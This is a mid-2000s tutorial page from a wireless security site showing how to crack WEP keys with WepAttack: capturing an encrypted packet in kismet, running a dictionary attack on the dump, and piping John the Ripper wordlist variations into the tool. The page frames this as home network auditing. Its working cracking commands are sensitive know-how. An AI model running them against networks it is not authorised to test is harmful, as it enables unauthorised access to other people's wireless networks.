Linux

 

Linux tools, Howtos

 

Tools Index

 

Wireless Commands

 

FC6 Build Howto

 

FC5 Build Howto

 

FC4 Build Howto

 

Live Linux Distros

 

 

Site Search

 

 

 

 

Windows

 

WIN32 tools, Howtos

 

Tools Index

 

 

Get Firefox!

 

 

General

 

Miscellaneous WI-FI

 

Default WI-FI Settings

 

Rogue AP Howtos

 

WI-FI Certifications

 

802.11 Standards

 

STEP BY STEP Guides

 

Formats / Extensions

 

WI-FI Home Security

 

Useful Links

 

 

 

 

WepAttack Main:

 

Project homepage: http://wepattack.sourceforge.net/

"WepAttack is a WLAN open source Linux tool for breaking 802.11 WEP keys. This tool is based on an active dictionary attack that tests millions of words to find the right key.  Only one packet is required to start an attack." -wepattack.sourceforge.net

WepAttack is surely the quickest way of breaking into any WEP enable WLAN.  We see regular WepAttack audits as essential on home WLANs (commerce should be using something stronger than WEP!) akin to performing regular lophtcrack password audits.

Installing WepAttack

 

 

Capturing Encrypted Packets:

Before we can attempt to break any WEP using WepAttack's dictionary attack we first need to capture one encrypted packet.  The easiest way to do this is with kismet (any tool that generates dump files in pcap format can be used e.g. Tcpdump, Ethereal) assuming you have installed kismet as per our instructions as follows:

kismet

Use 's' to sort the networks and 'f' to sort by first time seen

Use 'L' to lock kismet to the channel of the desired network

Now we simply wait until we have captured an encrypted packet or packets.  The Info window to the right hand side of the kismet display and the Cryptd counter will indicate when we have the necessary packet (see below).

 

NOTE: We have captured 44 encrypted packets, but only 1 is required.

 

Now we have our encrypted packets, exist from kismet 'Q'. 

 

My kismet dump is now auto saved to /tmp/Kismet-Dec-01-2005-3.dump (filename will obviously vary)

 

 

Using WepAttack:

usage: wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network]

Now we process the kismet dump file with WepAttack against our specified wordlist:

cd /tools/wifi/WepAttack-0.1.3/src

wepattack -f /tmp/Kismet-Dec-01-2005-3.dump -w wordlist -m 128

*This will attempt to crack all networks to be more specific use the -n switch.

 

 

Results are written to WepAttack-[current_date].log

If the network is utilising a dictionary word that is contained within the wordlist you are using you should be able to determine the WEP key. 

 

 

Using JtR with WepAttack:

John the Ripper (JtR) is a very efficient password cracker.  JtR is able to take a word from a dictionary file and generate different variations of the same word e.g. world would be expanded to World, w0rld, world1 etc..

To use JtR output with WepAttack we use the following syntax:

./john –wordfile:wordlist  –rules –stdout | wepattack –f /tmp/Kismet-Dec-01-2005-3.dump

Using JtR to generate variations on the default wordlist expands the dictionary attack from  3,290,000 words to well in excess of 15,500,000 words!

 

  
 
  © Copyright 2005-2006 Wirelessdefence.org. All Rights Reserved.